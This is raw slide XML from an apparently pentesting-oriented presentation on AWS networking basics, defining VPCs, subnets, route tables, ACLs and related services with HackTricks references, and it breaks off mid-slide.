              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-persistence/aws-ec2-persistence</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="17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Basic Information</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Google Shape;37;p7"/>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38" name="Google Shape;38;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344550" y="1041825"/>
            <a:ext cx="8170500" cy="36219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VPC - Virtual Private Cloud</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Subnets</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Route Tables</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Internet Gateways</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ACLs</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Security Groups</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Elastic IP Addresses</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VPNs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0"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EC2</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Instance / AMI / Volume / Snapshot</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Instance Profiles</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Metadata</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1"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SSM</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ELB</a:t>
            </a:r>
            <a:endParaRPr>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39"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VPC - Virtual Private Cloud</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Google Shape;44;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195150" y="907900"/>
            <a:ext cx="8823300" cy="4248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Virtual Private Clouds (VPCs) are a fundamental component of Amazon Web Services (AWS) infrastructure that provides customers with a logically isolated section of the AWS Cloud to launch their AWS resources in. The main concepts of Amazon VPC include:</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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Subnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: VPCs are divided into subnets, which are smaller network segments that can be used to isolate AWS resources for security or performance reasons.</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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Route Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection.</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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Network Access Control Lists (ACLs):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges.</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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Internet Gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: An Internet Gateway is a VPC component that allows communication between instances in your VPC and the internet.</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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Security Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: Security groups are a virtual firewall that control inbound and outbound network traffic to instances in a VPC.</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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Elastic IP addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: Elastic IP addresses are static IP addresses assigned to an AWS account. They can be associated with an EC2 instance, which allows the IP address to persist even if the instance is stopped or restarted.</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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Virtual Private Network (VPN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: VPNs allow you to securely connect your on-premises network to your VPC over the internet.</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100">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="4787525"/>
            <a:ext cx="7286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dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information</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4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9"/>
          <p:cNvSpPr txBox="1"/>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VPC - Virtual Private Cloud</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Google Shape;51;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="386225" y="857050"/>
            <a:ext cx="2161474" cy="1703250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Google Shape;52;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="2644408"/>
            <a:ext cx="9143998" cy="2191484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Google Shape;53;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2877025" y="809375"/>
            <a:ext cx="2707150" cy="633218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Google Shape;54;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5853846" y="671096"/>
            <a:ext cx="3061566" cy="1973300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Google Shape;55;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2847200" y="1418275"/>
            <a:ext cx="2707151" cy="1321550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889275" y="4777850"/>
            <a:ext cx="73203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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information</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57"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VPC - Subnets</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Google Shape;62;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2160725"/>
            <a:ext cx="8839201" cy="1323862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p10"/>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64" name="Google Shape;64;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355975" y="961750"/>
            <a:ext cx="8001000" cy="13053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2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Subnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: VPCs are divided into subnets, which are smaller network segments that can be used to isolate AWS resources for security or performance reasons.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1"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When creating resources that need to be allocated in some network you will need to choose subnetworks, not VPCs.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Google Shape;65;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3636987"/>
            <a:ext cx="8839200" cy="892285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866850" y="4711313"/>
            <a:ext cx="7330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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information</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67"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6.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1"/>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VPC - Route Tables</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p11"/>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73" name="Google Shape;73;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8001000" cy="22812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2"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Route Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115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In general, nobody touches these values. You will usually find access to the:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115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Local VPC</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115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NAT</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115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Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet).</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115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VPC endpoints (to access S3 from private networks)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Google Shape;74;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="201175" y="3270700"/>
            <a:ext cx="3893024" cy="1361611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Google Shape;75;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4550625" y="3270700"/>
            <a:ext cx="4296360" cy="1361600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4711325"/>
            <a:ext cx="7357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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information</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77"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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="359450"/>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VPC - ACLs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p12"/>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83" name="Google Shape;83;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457350" y="806250"/>
            <a:ext cx="8229300" cy="17169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lt2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Network Access Control Lists (ACLs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1"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It’s most frequent to allow/deny access using security groups, but this is the way to completely cut established reverse shells (from EC2 to outside). A modified rule in a security groups doesn’t stop already established connections</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1"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However, this applies to the whole subnetworks so needed functionality might be disturbed</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Google Shape;84;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="370325" y="2470150"/>
            <a:ext cx="8023044" cy="2368549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4778850"/>
            <a:ext cx="7371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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information</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8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8.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VPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
